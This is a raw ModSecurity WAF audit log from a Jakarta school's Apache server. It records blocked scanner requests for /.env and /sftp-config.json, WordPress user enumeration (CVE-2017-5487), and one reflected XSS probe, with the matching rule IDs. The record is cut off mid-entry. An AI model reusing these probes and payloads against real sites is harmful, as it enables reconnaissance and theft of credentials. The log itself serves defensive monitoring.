Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --389c7d19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --389c7d19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243110328 787 (- - -) Stopwatch2: 1748742243110328 787; combined=254, p1=210, p2=0, p3=0, p4=0, p5=44, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --389c7d19-Z-- --6ce3d328-A-- [01/Jun/2025:08:44:03 +0700] aDuwY-4LjVe0Eerk_ZaIhQAAAFY 103.236.140.4 32808 103.236.140.4 8181 --6ce3d328-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --6ce3d328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ce3d328-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243110337 963 (- - -) Stopwatch2: 1748742243110337 963; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ce3d328-Z-- --37d1ec0c-A-- [01/Jun/2025:08:44:03 +0700] aDuwYwQ4kZQGAOBHoB5DEQAAAMk 103.236.140.4 32812 103.236.140.4 8181 --37d1ec0c-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --37d1ec0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37d1ec0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243122029 688 (- - -) Stopwatch2: 1748742243122029 688; combined=272, p1=244, p2=0, p3=0, p4=0, p5=28, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37d1ec0c-Z-- --2c639f6c-A-- [01/Jun/2025:08:44:03 +0700] aDuwY-4LjVe0Eerk_ZaIhgAAAEE 103.236.140.4 32814 103.236.140.4 8181 --2c639f6c-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --2c639f6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c639f6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243122241 662 (- - -) Stopwatch2: 1748742243122241 662; combined=232, p1=199, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c639f6c-Z-- --0c072472-A-- [01/Jun/2025:09:04:26 +0700] aDu1KkaTRmdfB-FaJjm6AgAAAAg 103.236.140.4 33330 103.236.140.4 8181 --0c072472-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c072472-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c072472-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748743466144896 2809 (- - -) Stopwatch2: 1748743466144896 2809; combined=1238, p1=440, p2=768, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c072472-Z-- --eaa0ee38-A-- [01/Jun/2025:09:04:28 +0700] aDu1LEaTRmdfB-FaJjm6BAAAAAs 103.236.140.4 33334 103.236.140.4 8181 --eaa0ee38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eaa0ee38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaa0ee38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748743468591540 2151 (- - -) Stopwatch2: 1748743468591540 2151; combined=1047, p1=391, p2=631, p3=0, p4=0, p5=25, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaa0ee38-Z-- --89e54165-A-- [01/Jun/2025:09:07:34 +0700] aDu15kaTRmdfB-FaJjm6EwAAAAg 103.236.140.4 33492 103.236.140.4 8181 --89e54165-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 Accept-Charset: utf-8 --89e54165-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89e54165-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748743654866038 773 (- - -) Stopwatch2: 1748743654866038 773; combined=328, p1=287, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89e54165-Z-- --b903a435-A-- [01/Jun/2025:09:30:11 +0700] aDu7M-4LjVe0Eerk_ZaJMAAAAEQ 103.236.140.4 34092 103.236.140.4 8181 --b903a435-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.204.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.204.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b903a435-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b903a435-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748745011989457 3534 (- - -) Stopwatch2: 1748745011989457 3534; combined=1536, p1=555, p2=950, p3=0, p4=0, p5=31, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b903a435-Z-- --5128ed4d-A-- [01/Jun/2025:09:53:36 +0700] aDvAsEaTRmdfB-FaJjm6QQAAABI 103.236.140.4 34652 103.236.140.4 8181 --5128ed4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.53.19.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.53.19.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5128ed4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5128ed4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748746416298141 3250 (- - -) Stopwatch2: 1748746416298141 3250; combined=1477, p1=571, p2=877, p3=0, p4=0, p5=29, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5128ed4d-Z-- --2b5c8019-A-- [01/Jun/2025:10:03:28 +0700] aDvDAAQHT18O7PnXxsQJJAAAAJA 103.236.140.4 34950 103.236.140.4 8181 --2b5c8019-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.42.255.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.42.255.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2b5c8019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b5c8019-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748747008256270 3126 (- - -) Stopwatch2: 1748747008256270 3126; combined=1353, p1=495, p2=828, p3=0, p4=0, p5=30, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b5c8019-Z-- --d7846112-A-- [01/Jun/2025:10:45:18 +0700] aDvMzgQHT18O7PnXxsQJXgAAAIo 103.236.140.4 35852 103.236.140.4 8181 --d7846112-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.242.89.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.242.89.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d7846112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7846112-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748749518734675 2555 (- - -) Stopwatch2: 1748749518734675 2555; combined=1253, p1=413, p2=812, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7846112-Z-- --e573a05b-A-- [01/Jun/2025:10:46:46 +0700] aDvNJgQ4kZQGAOBHoB5D7wAAAMs 103.236.140.4 35898 103.236.140.4 8181 --e573a05b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.239.129.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.239.129.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e573a05b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e573a05b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748749606772840 3052 (- - -) Stopwatch2: 1748749606772840 3052; combined=1362, p1=489, p2=838, p3=0, p4=0, p5=35, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e573a05b-Z-- --3176863e-A-- [01/Jun/2025:11:15:35 +0700] aDvT50aTRmdfB-FaJjnIvgAAABY 103.236.140.4 42334 103.236.140.4 8181 --3176863e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3176863e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3176863e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748751335666586 782 (- - -) Stopwatch2: 1748751335666586 782; combined=278, p1=238, p2=0, p3=0, p4=0, p5=40, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3176863e-Z-- --78bbdf4c-A-- [01/Jun/2025:11:28:27 +0700] aDvW60aTRmdfB-FaJjnNkQAAAAk 103.236.140.4 33878 103.236.140.4 8181 --78bbdf4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.102.128.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.102.128.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --78bbdf4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78bbdf4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748752107195580 2769 (- - -) Stopwatch2: 1748752107195580 2769; combined=1280, p1=432, p2=817, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78bbdf4c-Z-- --3c4c6b7e-A-- [01/Jun/2025:11:46:10 +0700] aDvbEgQ4kZQGAOBHoB5jUgAAAMU 103.236.140.4 34258 103.236.140.4 8181 --3c4c6b7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.236.205 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.236.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3c4c6b7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c4c6b7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748753170146770 868 (- - -) Stopwatch2: 1748753170146770 868; combined=345, p1=304, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c4c6b7e-Z-- --81ed366b-A-- [01/Jun/2025:12:06:38 +0700] aDvf3u4LjVe0Eerk_ZadXwAAAFM 103.236.140.4 34610 103.236.140.4 8181 --81ed366b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81ed366b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81ed366b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748754398605545 3704 (- - -) Stopwatch2: 1748754398605545 3704; combined=1652, p1=613, p2=990, p3=0, p4=0, p5=48, sr=146, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81ed366b-Z-- --53f04671-A-- [01/Jun/2025:12:12:26 +0700] aDvhOgQHT18O7PnXxsQd6wAAAJM 103.236.140.4 34694 103.236.140.4 8181 --53f04671-B-- GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169362674 --53f04671-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --53f04671-E-- --53f04671-H-- Message: Access denied with code 403 (phase 2). Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748754746461487 4229 (- - -) Stopwatch2: 1748754746461487 4229; combined=2317, p1=523, p2=1760, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53f04671-Z-- --86681659-A-- [01/Jun/2025:12:31:02 +0700] aDvllgQ4kZQGAOBHoB5jbgAAAM8 103.236.140.4 34832 103.236.140.4 8181 --86681659-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 180.193.178.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 180.193.178.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86681659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86681659-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748755862887161 3572 (- - -) Stopwatch2: 1748755862887161 3572; combined=1465, p1=479, p2=953, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86681659-Z-- --d33f7e17-A-- [01/Jun/2025:12:42:35 +0700] aDvoSwQHT18O7PnXxsQeBQAAAIQ 103.236.140.4 34892 103.236.140.4 8181 --d33f7e17-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.195.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.195.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d33f7e17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close 